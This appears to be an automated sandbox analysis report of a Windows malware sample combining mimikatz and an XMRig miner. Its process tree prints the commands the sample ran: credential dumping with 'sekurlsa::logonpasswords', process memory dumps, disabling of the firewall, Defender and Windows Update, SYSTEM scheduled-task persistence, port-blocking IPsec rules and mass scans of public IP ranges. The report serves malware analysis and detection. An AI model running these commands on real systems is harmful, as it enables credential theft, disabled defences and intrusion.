Overview

overview

10

Static

static

10

2024-08-12...tz.exe

windows7-x64

10

2024-08-12...tz.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    12-08-2024 07:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe

  • Size

    8.3MB

  • MD5

    835a2360a11924db990e8cbd0c8bc692

  • SHA1

    4c4ef0bd7d8e483dbc6c51af2c28ccc06ad418a9

  • SHA256

    c72529a9e4b92eb7d5600123453b2bd29cab4a68aa47f7646877e687b0c8e7c2

  • SHA512

    d8c613c8741f1eb6c1550f282b3a494af1bc57907bfad08a140c01d2b5cfcd403c7d1c6b86ea98aaa493e0bd178ee7f9dec17d17ce2469261a1f43cccb631dec

  • SSDEEP

    196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1

Score
10/10
mimikatzxmrigcredential_accessdiscoveryevasionexecutionminerpersistenceprivilege_escalationupx

Malware Config

Signatures

  • Disables service(s) 3 TTPs
    evasionexecution
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

    mimikatz
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Contacts a large (28675) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

    discovery
  • OS Credential Dumping: LSASS Memory 1 TTPs

    Malicious access to Credentials History.

    credential_access
  • XMRig Miner payload 12 IoCs
    miner
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
    persistence
  • Modifies Windows Firewall 2 TTPs 2 IoCs
    evasion
  • Executes dropped EXE 29 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Network Share Discovery 1 TTPs

    Attempt to gather information on host network.

    discovery
  • Creates a Windows Service
    persistence
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

    discovery
  • NSIS installer 3 IoCs
    installer
  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2132
      • C:\Windows\TEMP\awlverzbi\nqrzsm.exe
        "C:\Windows\TEMP\awlverzbi\nqrzsm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3756
    • C:\Users\Admin\AppData\Local\Temp\2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-08-12_835a2360a11924db990e8cbd0c8bc692_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4996
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\bekggbli\iuclszl.exe
        2⤵
        • System Location Discovery: System Language Discovery
        • System Network Configuration Discovery: Internet Connection Discovery
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:4840
        • C:\Windows\bekggbli\iuclszl.exe
          C:\Windows\bekggbli\iuclszl.exe
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:216
    • C:\Windows\bekggbli\iuclszl.exe
      C:\Windows\bekggbli\iuclszl.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Event Triggered Execution: Image File Execution Options Injection
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3288
        • C:\Windows\SysWOW64\cacls.exe
          cacls C:\Windows\system32\drivers\etc\hosts /T /D users
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2560
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:3576
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4912
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
            3⤵
            • System Location Discovery: System Language Discovery
            PID:1596
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
            3⤵
            • System Location Discovery: System Language Discovery
            PID:4300
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static del all
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          PID:2044
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add policy name=Bastards description=FuckingBastards
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:1956
        • C:\Windows\SysWOW64\netsh.exe
          netsh ipsec static add filteraction name=BastardsList action=block
          2⤵
          • Event Triggered Execution: Netsh Helper DLL
          • System Location Discovery: System Language Discovery
          PID:3376
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:3804
          • C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe
            C:\Windows\dvpvfgkqq\vefdcrtiv\wpcap.exe /S
            3⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Loads dropped DLL
            • Drops file in System32 directory
            • Drops file in Program Files directory
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:1152
            • C:\Windows\SysWOW64\net.exe
              net stop "Boundary Meter"
              4⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:2360
              • C:\Windows\SysWOW64\net1.exe
                C:\Windows\system32\net1 stop "Boundary Meter"
                5⤵
                  PID:3008
              • C:\Windows\SysWOW64\net.exe
                net stop "TrueSight Meter"
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:3708
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop "TrueSight Meter"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3124
              • C:\Windows\SysWOW64\net.exe
                net stop npf
                4⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4472
                • C:\Windows\SysWOW64\net1.exe
                  C:\Windows\system32\net1 stop npf
                  5⤵
                    PID:4260
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  4⤵
                  • System Location Discovery: System Language Discovery
                  PID:4716
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    5⤵
                    • System Location Discovery: System Language Discovery
                    PID:4636
            • C:\Windows\SysWOW64\cmd.exe
              cmd /c net start npf
              2⤵
              • System Location Discovery: System Language Discovery
              PID:3152
              • C:\Windows\SysWOW64\net.exe
                net start npf
                3⤵
                  PID:3812
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1020
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c net start npf
                2⤵
                • System Location Discovery: System Language Discovery
                PID:3172
                • C:\Windows\SysWOW64\net.exe
                  net start npf
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:4808
                  • C:\Windows\SysWOW64\net1.exe
                    C:\Windows\system32\net1 start npf
                    4⤵
                      PID:4888
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
                  2⤵
                  • System Location Discovery: System Language Discovery
                  PID:232
                  • C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe
                    C:\Windows\dvpvfgkqq\vefdcrtiv\qeteblhlu.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\dvpvfgkqq\vefdcrtiv\Scant.txt
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:1036
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\dvpvfgkqq\Corporate\log.txt
                  2⤵
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  PID:972
                  • C:\Windows\dvpvfgkqq\Corporate\vfshost.exe
                    C:\Windows\dvpvfgkqq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3616
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
                  2⤵
                    PID:3724
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4832
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /sc minute /mo 1 /tn "blssqdfbz" /ru system /tr "cmd /c C:\Windows\ime\iuclszl.exe"
                      3⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:1844
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
                    2⤵
                    • System Location Discovery: System Language Discovery
                    PID:1316
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      3⤵
                        PID:3688
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "declipgtc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\bekggbli\iuclszl.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:5080
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
                      2⤵
                      • System Location Discovery: System Language Discovery
                      PID:1536
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2428
                      • C:\Windows\SysWOW64\schtasks.exe
                        schtasks /create /sc minute /mo 1 /tn "imcesgivu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\awlverzbi\nqrzsm.exe /p everyone:F"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        • Scheduled Task/Job: Scheduled Task
                        PID:1416
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3892
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:5104
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:640
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:4472
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4920
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:4636
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:1628
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3744
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2908
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      PID:3172
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:412
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static set policy name=Bastards assign=y
                      2⤵
                      • Event Triggered Execution: Netsh Helper DLL
                      • System Location Discovery: System Language Discovery
                      PID:2524
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd /c net stop SharedAccess
                      2⤵
                        PID:4316
                        • C:\Windows\SysWOW64\net.exe
                          net stop SharedAccess
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:684
                          • C:\Windows\SysWOW64\net1.exe
                            C:\Windows\system32\net1 stop SharedAccess
                            4⤵
                            • System Location Discovery: System Language Discovery
                            PID:4772
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c netsh firewall set opmode mode=disable
                        2⤵
                          PID:2228
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh firewall set opmode mode=disable
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2404
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c netsh Advfirewall set allprofiles state off
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:1668
                          • C:\Windows\SysWOW64\netsh.exe
                            netsh Advfirewall set allprofiles state off
                            3⤵
                            • Modifies Windows Firewall
                            • Event Triggered Execution: Netsh Helper DLL
                            • System Location Discovery: System Language Discovery
                            PID:2288
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c net stop MpsSvc
                          2⤵
                          • System Location Discovery: System Language Discovery
                          PID:4104
                          • C:\Windows\SysWOW64\net.exe
                            net stop MpsSvc
                            3⤵
                              PID:316
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop MpsSvc
                                4⤵
                                  PID:5036
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop WinDefend
                              2⤵
                              • System Location Discovery: System Language Discovery
                              PID:3892
                              • C:\Windows\SysWOW64\net.exe
                                net stop WinDefend
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4468
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop WinDefend
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:2408
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c net stop wuauserv
                              2⤵
                                PID:3952
                                • C:\Windows\SysWOW64\net.exe
                                  net stop wuauserv
                                  3⤵
                                    PID:3968
                                    • C:\Windows\SysWOW64\net1.exe
                                      C:\Windows\system32\net1 stop wuauserv
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3200
                                • C:\Windows\SysWOW64\cmd.exe
                                  cmd /c sc config MpsSvc start= disabled
                                  2⤵
                                    PID:1380
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config MpsSvc start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:4368
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config SharedAccess start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1496
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config SharedAccess start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      PID:1740
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config WinDefend start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4748
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config WinDefend start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:4980
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c sc config wuauserv start= disabled
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:4832
                                    • C:\Windows\SysWOW64\sc.exe
                                      sc config wuauserv start= disabled
                                      3⤵
                                      • Launches sc.exe
                                      • System Location Discovery: System Language Discovery
                                      PID:4384
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 772 C:\Windows\TEMP\dvpvfgkqq\772.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4228
                                  • C:\Windows\TEMP\xohudmc.exe
                                    C:\Windows\TEMP\xohudmc.exe
                                    2⤵
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1940
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 380 C:\Windows\TEMP\dvpvfgkqq\380.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4896
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2132 C:\Windows\TEMP\dvpvfgkqq\2132.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4860
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2640 C:\Windows\TEMP\dvpvfgkqq\2640.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:748
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2944 C:\Windows\TEMP\dvpvfgkqq\2944.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2268
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2968 C:\Windows\TEMP\dvpvfgkqq\2968.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4272
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3032 C:\Windows\TEMP\dvpvfgkqq\3032.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4468
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3856 C:\Windows\TEMP\dvpvfgkqq\3856.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2708
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3992 C:\Windows\TEMP\dvpvfgkqq\3992.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4228
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 4056 C:\Windows\TEMP\dvpvfgkqq\4056.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4000
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2652 C:\Windows\TEMP\dvpvfgkqq\2652.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3952
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2860 C:\Windows\TEMP\dvpvfgkqq\2860.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1956
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 1644 C:\Windows\TEMP\dvpvfgkqq\1644.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4376
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3588 C:\Windows\TEMP\dvpvfgkqq\3588.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3268
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 5024 C:\Windows\TEMP\dvpvfgkqq\5024.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:3480
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3604 C:\Windows\TEMP\dvpvfgkqq\3604.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2708
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 2340 C:\Windows\TEMP\dvpvfgkqq\2340.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4836
                                  • C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe
                                    C:\Windows\TEMP\dvpvfgkqq\teaimmcwl.exe -accepteula -mp 3744 C:\Windows\TEMP\dvpvfgkqq\3744.dmp
                                    2⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:888
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd.exe /c C:\Windows\dvpvfgkqq\vefdcrtiv\scan.bat
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:1252
                                    • C:\Windows\dvpvfgkqq\vefdcrtiv\nvmribbga.exe
                                      nvmribbga.exe TCP 194.110.0.1 194.110.255.255 445 512 /save
                                      3⤵
                                      • Executes dropped EXE
                                      • Drops file in Windows directory
                                      • System Location Discovery: System Language Discovery
                                      PID:5012
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                    2⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:5636
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                      3⤵
                                        PID:5736
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5704
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5720
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5812
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5572
                                      • C:\Windows\SysWOW64\cacls.exe
                                        cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                        3⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:5568
                                  • C:\Windows\SysWOW64\ogmqci.exe
                                    C:\Windows\SysWOW64\ogmqci.exe
                                    1⤵
                                    • Executes dropped EXE
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious use of SetWindowsHookEx
                                    PID:1408
                                  • C:\Windows\system32\cmd.EXE
